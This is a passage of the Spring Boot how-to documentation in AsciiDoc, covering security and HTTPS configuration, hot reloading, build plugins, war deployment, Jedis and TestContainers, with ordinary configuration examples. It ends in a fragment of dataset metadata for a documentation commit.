sanitized.\n\n\n\n[[howto-map-health-indicators-to-metrics]]\n=== Map Health Indicators to Micrometer Metrics\nSpring Boot health indicators return a `Status` type to indicate the overall system health.\nIf you want to monitor or alert on levels of health for a particular application, you can export these statuses as metrics via Micrometer.\nBy default, the status codes \"`UP`\", \"`DOWN`\", \"`OUT_OF_SERVICE`\" and \"`UNKNOWN`\" are used by Spring Boot.\nTo export these, you'll need to convert these states to some set of numbers so that they can be used with a Micrometer `Gauge`.\n\nThe following example shows one way to write such an exporter:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/actuate\/metrics\/MetricsHealthMicrometerExportExample.java[tag=configuration]\n----\n\n\n\n[[howto-security]]\n== Security\nThis section addresses questions about security when working with Spring Boot, including questions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application, it switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`, or `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not created.\nThis means you have the full feature set of Spring Security available (such as {spring-security-docs}#servlet-authentication[various authentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important chore for any application.\nIf you use Tomcat as a servlet container, then Spring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some environment settings, and you should be able to rely on the `HttpServletRequest` to report whether it is secure or not (even downstream of a proxy server that handles the real SSL termination).\nThe standard behavior is determined by the presence or absence of certain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are conventional, so it should work with most front-end proxies.\nYou can switch on the valve by adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-forwarded-for\n\tserver.tomcat.remoteip.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve.\nAlternatively, you can add the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some) requests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following `HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-hotswapping]]\n== Hot Swapping\nSpring Boot supports hot swapping.\nThis section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading.\nThe recommended approach is to use <<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides additional development-time features, such as support for fast application restarts and LiveReload as well as sensible development-time configuration (such as template caching).\nDevtools works by monitoring the classpath for changes.\nThis means that static resource changes must be \"built\" for the change to take effect.\nBy default, this happens automatically in Eclipse when you save your changes.\nIn IntelliJ IDEA, the Make Project command triggers the necessary build.\nDue to the <<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart exclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do development (all modern IDEs allow reloading of static resources and usually also allow hot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can be configured (see the `addResources` property) to support running from the command line with reloading of static files directly from source.\nYou can use that with an external css\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration option to disable caching (described later in this document).\nIf you use the `spring-boot-devtools` module, these properties are <<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>> for you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`] for other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`] for other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`] for other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as https:\/\/www.jrebel.com\/products\/jrebel[JRebel] it is usually significantly faster than a \"`cold start`\".\nYou should probably give it a try before investigating some of the more complex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it should reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\nSpring Boot includes build plugins for Maven and Gradle.\nThis section answers common questions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing the coordinates, name, and version of the project.\nThe plugins can also be configured to add additional properties through configuration.\nWhen such a file is present, Spring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-docs}#goals-build-info[Spring Boot Maven Plugin documentation] for more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the {spring-boot-gradle-plugin-docs}#integrating-with-actuator-build-info[Spring Boot Gradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\nBoth Maven and Gradle allow generating a `git.properties` file containing information about the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to generate a `git.properties` file.\nTo use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the https:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"2.2.2\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format: `yyyy-MM-dd'T'HH:mm:ssZ`.\nThis is the default format for both plugins listed above.\nUsing this format lets the time be parsed into a `Date` and its format, when serialized to JSON, to be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nThe `spring-boot-dependencies` POM manages the versions of common dependencies.\nThe Spring Boot plugins for Maven and Gradle allow these managed dependency versions to be customized using build properties.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of third-party dependencies.\nOverriding versions may cause compatibility issues.\n\nTo override dependency versions with Maven, see {spring-boot-maven-plugin-docs}#using[this section] of the Maven plugin's documentation.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-docs}#managing-dependencies-customizing[this section] of the Gradle plugin's documentation.\n\n\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR.\nIf you use the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are repackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin.\nHowever, you must additionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-docs}#repackage[plugin documentation] for full usage details.\n\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency.\nIf your application contains classes that you want to share with other projects, the recommended approach is to move that code into a separate module.\nThe separate module can then be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle plugins must be configured to produce a separate artifact that is suitable for use as a dependency.\nThe executable archive cannot be used as a dependency as the <<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar format>> packages application classes in `BOOT-INF\/classes`.\nThis means that they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is executable, a classifier must be specified.\nThis classifier is applied to the name of the executable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems.\nFor example, JRuby includes its own nested jar support, which assumes that the `jruby-complete.jar` is always directly available as a file in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be automatically unpacked when the executable jar first runs.\nSuch nested jars are written beneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that it will not delete the jars that have been unpacked to the temporary directory while the application is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven Plugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products, the executable version has additional configuration files that are not needed in a library jar.\nFor example, the `application.yml` configuration file might be excluded from the non-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar for the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you can use the `jvmArguments` property of the {spring-boot-maven-plugin-docs}[maven plugin].\n\nSee {spring-boot-maven-plugin-docs}#run-example-debug[this example] for more details.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using spring-boot-antlib\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war archive.\nTo make it executable, you can either use the `spring-boot-antlib` module or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested `BOOT-INF\/classes` directory.\n If you are building a war, package the application's classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib-provided` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class` is available).\n. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class` attribute in the manifest and specify the other properties it needs as manifest entries -- principally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and applications are deployed by default on an embedded Reactor Netty server, War deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a `SpringBootServletInitializer` subclass and override its `configure` method.\nDoing so makes use of Spring Framework's Servlet 3.0 support and lets you configure your application when it is launched by the servlet container.\nTypically, you should update your application's main class to extend `SpringBootServletInitializer`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war file rather than a jar file.\nIf you use Maven and `spring-boot-starter-parent` (which configures Maven's war plugin for you), all you need to do is to modify `pom.xml` to change the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the project, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not interfere with the servlet container to which the war file is deployed.\nTo do so, you need to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration.\nAmong other limitations, `compileOnly` dependencies are not on the test classpath, so any web-based integration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>, marking the embedded servlet container dependency as provided produces an executable war file with the provided dependencies packaged in a `lib-provided` directory.\nThis means that, in addition to being deployable to a servlet container, you can also run your application by using `java -jar` on the command line.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to a Spring Boot application.\nTo do so, throw away the code that creates your `ApplicationContext` and replace it with calls to `SpringApplication` or `SpringApplicationBuilder`.\nSpring MVC web applications are generally amenable to first creating a deployable war application and then migrating it later to an executable war or jar.\nSee the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting Started Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a class called `Application`) and adding the Spring Boot `@SpringBootApplication` annotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here.\nThere might be some beans you can remove later and let Spring Boot provide its own defaults for them, but it should be possible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or `\/META-INF\/resources`) in the classpath root.\nThe same applies to `messages.properties` (which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further changes.\nIf you have other features in your application (for instance, using other servlets or filters), you may need to add some configuration to your `Application` context, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the container as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a `<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in your `Application`.\n Alternatively, simple cases where annotation configuration is heavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to your `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you need to share the customizations of the builder in a method that is both available to the `SpringBootServletInitializer` callback and in the `main` method in a class similar to the following:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different techniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring Servlet 3.0+ initializer support classes.\nNormally, all the code from an existing `WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`.\nIf your existing application has more than one `ApplicationContext` (for example, if it uses `AbstractDispatcherServletInitializer`) then you might be able to combine all your context sources into a single `SpringApplication`.\nThe main complication you might encounter is if combining does not work and you need to maintain the context hierarchy.\nSee the <<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for examples.\nAn existing parent context that contains web-specific features usually needs to be broken up so that all the `ServletContextAware` components are in the child context.\n\nApplications that are not already Spring applications might be convertible to Spring Boot applications, and the previously mentioned guidance may help.\nHowever, you may yet encounter problems.\nIn that case, we suggest https:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow with a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet initializer *directly* implements `WebApplicationInitializer` (even if you extend from a base class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version rather than the version that was pre-installed with the server.\nYou can do so by adding a `WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses https:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce].\nYou need to exclude that dependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead.\nSpring Boot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-data-redis') {\n\t\t exclude group: 'io.lettuce', module: 'lettuce-core'\n\t\t}\n\t\timplementation 'redis.clients:jedis'\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-testcontainers]]\n=== Use TestContainers for integration testing\nThe https:\/\/www.testcontainers.org\/[TestContainers] library provides a way to manage services running inside Docker containers.\nIt integrates with JUnit, allowing you to write a test class that can start up a container before any of the tests run.\nTestContainers is especially useful for writing integration tests that talk to a real backend service such as MySQL, MongoDB, Cassandra etc.\nTestContainers can be used in a Spring Boot test as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@SpringBootTest\n@Testcontainers\nclass ExampleIntegrationTests {\n\n @Container\n static Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n}\n----\n\nThis will start up a docker container running Neo4j (if Docker is running locally) before any of the tests are run.\nIn most cases, you will need to configure the application using details from the running container, such as container IP or port.\n\nThis can be done with a static `@DynamicPropertySource` method that allows adding adding dynamic property values to the Spring Environment.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@SpringBootTest\n@Testcontainers\nclass ExampleIntegrationTests {\n\n @Container\n static Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n @DynamicPropertySource\n static void neo4jProperties(DynamicPropertyRegistry registry) {\n registry.add(\"spring.data.neo4j.uri\", neo4j::getBoltUrl);\n }\n\n}\n----\n\nThe above configuration allows Neo4j-related beans in the application to communicate with Neo4j running inside the Testcontainers-managed Docker container.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34d28f48ca1d048ad74b3bb76fc58ad4a9732804","subject":"Fix Undertow access log dir property name in doc","message":"Fix Undertow access log dir property name in doc\n\nSee 